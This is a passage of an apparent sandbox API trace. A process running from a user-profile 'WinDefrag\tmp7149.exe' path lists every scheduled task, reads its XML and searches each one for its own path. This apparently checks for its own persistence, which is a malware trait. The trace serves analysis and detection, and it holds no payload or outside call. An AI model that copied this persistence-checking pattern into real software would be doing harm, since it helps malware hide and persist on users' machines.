pName=0x1edb10*="UPnPHostConfig") returned 0x0 [0260.933] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n") returned 0x0 [0260.935] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.956] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.956] IUnknown:Release (This=0x456b40) returned 0x0 [0260.956] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.957] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.957] IUnknown:Release (This=0x456b40) returned 0x0 [0260.957] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.957] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x27, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.957] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0260.959] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.959] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458090) returned 0x0 [0260.959] IRegisteredTask:get_Name (in: This=0x458090, pName=0x1edb10 | out: pName=0x1edb10*="HiveUploadTask") returned 0x0 [0260.959] IRegisteredTask:get_Xml (in: This=0x458090, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n PT1H\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n \r\n PT2M\r\n 3\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n {BA677074-762C-444b-94C8-8C83F93F6605}\r\n \r\n \r\n") returned 0x0 [0260.962] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n PT1H\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n \r\n PT2M\r\n 3\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n {BA677074-762C-444b-94C8-8C83F93F6605}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0261.003] IUnknown:Release (This=0x458090) returned 0x0 [0261.003] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.003] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0261.005] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0261.005] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.005] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0261.005] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0261.005] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0261.007] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0261.007] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0261.007] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="ResolutionHost") returned 0x0 [0261.007] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n Microsoft\\Windows\\WDI\\ResolutionHost\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 10\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\r\n \r\n \r\n") returned 0x0 [0261.010] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n Microsoft\\Windows\\WDI\\ResolutionHost\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 10\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0261.041] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.041] IUnknown:Release (This=0x456b40) returned 0x0 [0261.041] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0261.043] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0261.043] IUnknown:Release (This=0x456b40) returned 0x0 [0261.043] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0261.043] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0261.043] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0261.045] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0261.045] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x4580a0) returned 0x0 [0261.045] IRegisteredTask:get_Name (in: This=0x4580a0, pName=0x1edb10 | out: pName=0x1edb10*="QueueReporting") returned 0x0 [0261.045] IRegisteredTask:get_Xml (in: This=0x4580a0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n 1.0\r\n \r\n \r\n \r\n PT13M\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n 5\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -queuereporting\r\n \r\n \r\n") returned 0x0 [0261.048] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n 1.0\r\n \r\n \r\n \r\n PT13M\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n 5\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -queuereporting\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0261.083] IUnknown:Release (This=0x4580a0) returned 0x0 [0261.083] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.083] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0261.085] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0261.085] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.085] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0261.085] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2a, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0261.085] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0261.087] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0261.087] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x4580a0) returned 0x0 [0261.087] IRegisteredTask:get_Name (in: This=0x4580a0, pName=0x1edb10 | out: pName=0x1edb10*="BfeOnServiceStartTypeChange") returned 0x0 [0261.087] IRegisteredTask:get_Xml (in: This=0x4580a0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n 7\r\n Queue\r\n true\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n") returned 0x0 [0261.089] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n 7\r\n Queue\r\n true\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0261.128] IUnknown:Release (This=0x4580a0) returned 0x0 [0261.128] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.128] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0261.130] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0261.130] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.130] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0261.130] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2b, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0261.130] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0261.132] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0261.132] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x4580a0) returned 0x0 [0261.132] IRegisteredTask:get_Name (in: This=0x4580a0, pName=0x1edb10 | out: pName=0x1edb10*="UpdateLibrary") returned 0x0 [0261.132] IRegisteredTask:get_Xml (in: This=0x4580a0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n") returned 0x0 [0261.134] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0261.199] IUnknown:Release (This=0x4580a0) returned 0x0 [0261.199] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.199] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0261.200] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0261.200] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.200] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0261.200] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0261.200] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0261.203] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0261.203] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458030) returned 0x0 [0261.203] IRegisteredTask:get_Name (in: This=0x458030, pName=0x1edb10 | out: pName=0x1edb10*="ConfigNotification") returned 0x0 [0261.203] IRegisteredTask:get_Xml (in: This=0x458030, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft Corporation\r\n Microsoft Corporation\r\n This scheduled task notifies the user that Windows Backup has not been configured.\r\n Microsoft\\Windows\\WindowsBackup\\ConfigNotification\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)\r\n \r\n \r\n \r\n 2010-11-28T10:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %systemroot%\\System32\\sdclt.exe\r\n /CONFIGNOTIFICATION\r\n \r\n \r\n") returned 0x0 [0261.214] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation\r\n Microsoft Corporation\r\n This scheduled task notifies the user that Windows Backup has not been configured.\r\n Microsoft\\Windows\\WindowsBackup\\ConfigNotification\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)\r\n \r\n \r\n \r\n 2010-11-28T10:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %systemroot%\\System32\\sdclt.exe\r\n /CONFIGNOTIFICATION\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0261.264] IUnknown:Release (This=0x458030) returned 0x0 [0261.264] IUnknown:Release (This=0x456b40) returned 0x0 [0261.264] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0261.265] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0261.265] IUnknown:Release (This=0x456b40) returned 0x0 [0261.265] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0261.265] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0261.265] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0261.268] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0261.268] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458090) returned 0x0 [0261.268] IRegisteredTask:get_Name (in: This=0x458090, pName=0x1edb10 | out: pName=0x1edb10*="Calibration Loader") returned 0x0 [0261.268] IRegisteredTask:get_Xml (in: This=0x458090, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n ConsoleConnect\r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490d-9576-9E20CDBC20BD}\r\n \r\n \r\n") returned 0x0 [0261.270] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n ConsoleConnect\r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490d-9576-9E20CDBC20BD}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0261.311] IUnknown:Release (This=0x458090) returned 0x0 [0261.311] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.311] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0261.312] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0261.312] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.312] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0261.312] IUnknown:Release (This=0x4569f0) returned 0x0 [0261.312] TaskScheduler:IUnknown:Release (This=0x456970) returned 0x0 [0261.312] ITaskFolderCollection:get_Item (in: This=0x456830, index=0x1ede70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x1ede20 | out: ppFolder=0x1ede20*=0x45a670) returned 0x0 [0261.312] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edcb0 | out: ppTasks=0x1edcb0*=0x456970) returned 0x0 [0261.314] IRegisteredTaskCollection:get_Count (in: This=0x456970, pCount=0x1ede00 | out: pCount=0x1ede00*=1) returned 0x0 [0261.314] IRegisteredTaskCollection:get_Item (in: This=0x456970, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edca8 | out: ppRegisteredTask=0x1edca8*=0x4569f0) returned 0x0 [0261.314] IRegisteredTask:get_Name (in: This=0x4569f0, pName=0x1edca0 | out: pName=0x1edca0*="MP Scheduled Scan") returned 0x0 [0261.314] IRegisteredTask:get_Xml (in: This=0x4569f0, pXml=0x1edc90 | out: pXml=0x1edc90*="\r\n\r\n \r\n Scheduled Scan\r\n \r\n \r\n \r\n 2000-01-01T05:07:30\r\n 2100-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n PT0H1M0S\r\n PT4H0M0S\r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n c:\\program files\\windows defender\\MpCmdRun.exe\r\n Scan -ScheduleJob -WinTask -RestrictPrivilegesScan\r\n \r\n \r\n") returned 0x0 [0261.317] StrStrIW (lpFirst="\r\n\r\n \r\n Scheduled Scan\r\n \r\n \r\n \r\n 2000-01-01T05:07:30\r\n 2100-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n PT0H1M0S\r\n PT4H0M0S\r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n c:\\program files\\windows defender\\MpCmdRun.exe\r\n Scan -ScheduleJob -WinTask -RestrictPrivilegesScan\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0261.356] IUnknown:Release (This=0x4569f0) returned 0x0 [0261.356] IUnknown:Release (This=0x456970) returned 0x0 [0261.356] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edc98 | out: ppFolders=0x1edc98*=0x456970) returned 0x0 [0261.358] ITaskFolderCollection:get_Count (in: This=0x456970, pCount=0x1ede18 | out: pCount=0x1ede18*=0) returned 0x0 [0261.358] IUnknown:Release (This=0x456970) returned 0x0 [0261.358] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0261.358] IUnknown:Release (This=0x456830) returned 0x0 [0261.358] TaskScheduler:IUnknown:Release (This=0x4567c0) returned 0x0 [0261.358] ITaskFolderCollection:get_Item (in: This=0x456710, index=0x1ee000*(varType=0x3, wReserved1=0x2b, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x1), ppFolder=0x1edfb0 | out: 